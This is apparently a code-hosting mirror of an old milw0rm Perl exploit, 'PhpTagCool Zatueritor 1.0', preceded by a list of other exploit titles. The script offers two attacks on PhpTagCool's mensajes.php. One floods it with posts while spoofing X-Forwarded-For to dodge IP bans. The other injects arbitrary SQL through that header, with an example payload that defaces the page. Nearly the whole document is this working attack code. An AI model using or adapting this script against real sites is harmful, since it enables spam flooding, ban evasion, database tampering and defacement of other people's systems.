
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
122 lines
3.3 KiB
Raku
Executable file
122 lines
3.3 KiB
Raku
Executable file
#!/usr/bin/perl
|
|
## PhpTagCool Zatueritor 1.0
|
|
## Copyright: Megabyte www.mbytesecurity.org
|
|
## Greetz: Rootbox for discovering the forwarded-for issue
|
|
## Te amo Pandora
|
|
## Crashcool,fuiste defaceado por un bug de tu propia programacion,ahora que inventaras?
|
|
|
|
use IO::Socket;
|
|
|
|
$x = 0;
|
|
|
|
print q(
|
|
PhpTagCool Zatueritor 1.0
|
|
by Megabyte
|
|
|
|
);
|
|
print q(Host |sin http://www.| );
|
|
$host = <STDIN>;
|
|
chop ($host);
|
|
|
|
print q(Ruta |ejemplo. /phptagcool/ o /| );
|
|
$pth = <STDIN>;
|
|
chop ($pth);
|
|
|
|
print q(Tipo de Atake |1 = Posteo Masivo, 2 = Injeccion SQL| );
|
|
$type = <STDIN>;
|
|
chop ($type);
|
|
|
|
## The Flood Attack
|
|
if($type == 1){
|
|
|
|
|
|
while($x != 255)
|
|
{
|
|
|
|
|
|
$nick = "nick=megabyte";
|
|
|
|
## We generate our own ip address so we won't be banned :)
|
|
$ip = "127.0.0" . "$x";
|
|
|
|
|
|
$postit = "$nick"."&url=http%3A%2F%2Fwww.mbytesecurity.org&mensaje=FloodingLam
|
|
eTag&Submit=Enviar";
|
|
|
|
|
|
$lrg = length $postit;
|
|
|
|
|
|
my $sock = new IO::Socket::INET (
|
|
PeerAddr => "$host",
|
|
PeerPort => "80",
|
|
Proto => "tcp",
|
|
);
|
|
die "\nNo se pudo conectar :( $!\n" unless $sock;
|
|
|
|
## We Fake the X-Forwarded-For header,so we can post with multiple ip's
|
|
print $sock "POST $pth"."mensajes.php HTTP/1.1\n";
|
|
print $sock "Host: $host\n";
|
|
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwav
|
|
e-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
|
|
print $sock "Referer: $host\n";
|
|
print $sock "Accept-Language: en-us\n";
|
|
print $sock "Content-Type: application/x-www-form-urlencoded\n";
|
|
print $sock "Accept-Encoding: gzip, deflate\n";
|
|
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox
|
|
/1.0.4\n";
|
|
print $sock "X-Forwarded-For: $ip\n";
|
|
print $sock "Connection: Keep-Alive\n";
|
|
print $sock "Cache-Control: no-cache\n";
|
|
print $sock "Content-Length: $lrg\n\n";
|
|
print $sock "$postit\n";
|
|
close($sock);
|
|
|
|
|
|
syswrite STDOUT, ".";
|
|
|
|
|
|
$x++;
|
|
}
|
|
|
|
## The SQL injection attack :)
|
|
}
|
|
elsif ($type == 2){
|
|
|
|
print q(Inyeccion a ejecutar Ejemplo 127.0.0.1'),('<h1>owned</h1>','http://mbytesecurity.
|
|
org','leim','hoy','11 );
|
|
$sql = <STDIN>;
|
|
chop ($sql);
|
|
|
|
|
|
|
|
my $sock = new IO::Socket::INET (
|
|
PeerAddr => "$host",
|
|
PeerPort => "80",
|
|
Proto => "tcp",
|
|
);
|
|
die "\nNo se pudo conectar :( $!\n" unless $sock;
|
|
|
|
|
|
print $sock "POST $pth"."mensajes.php HTTP/1.1\n";
|
|
print $sock "Host: $host\n";
|
|
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q
|
|
=0.8,image/png,*/*;q=0.5\n";
|
|
print $sock "Referer: $host\n";
|
|
print $sock "Accept-Language: en-us\n";
|
|
print $sock "Content-Type: application/x-www-form-urlencoded\n";
|
|
print $sock "Accept-Encoding: gzip, deflate\n";
|
|
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox
|
|
/1.0.4\n";
|
|
print $sock "Connection: Keep-Alive\n";
|
|
print $sock "Cache-Control: no-cache\n";
|
|
print $sock "Content-Length: $lrg\n\n";
|
|
print $sock "X-Forwarded-For: $sql\n";
|
|
close($sock);
|
|
|
|
}else{
|
|
|
|
die "Solo hay 2 opciones IMBECIL\n";
|
|
}
|
|
|
|
# milw0rm.com [2005-09-11]
|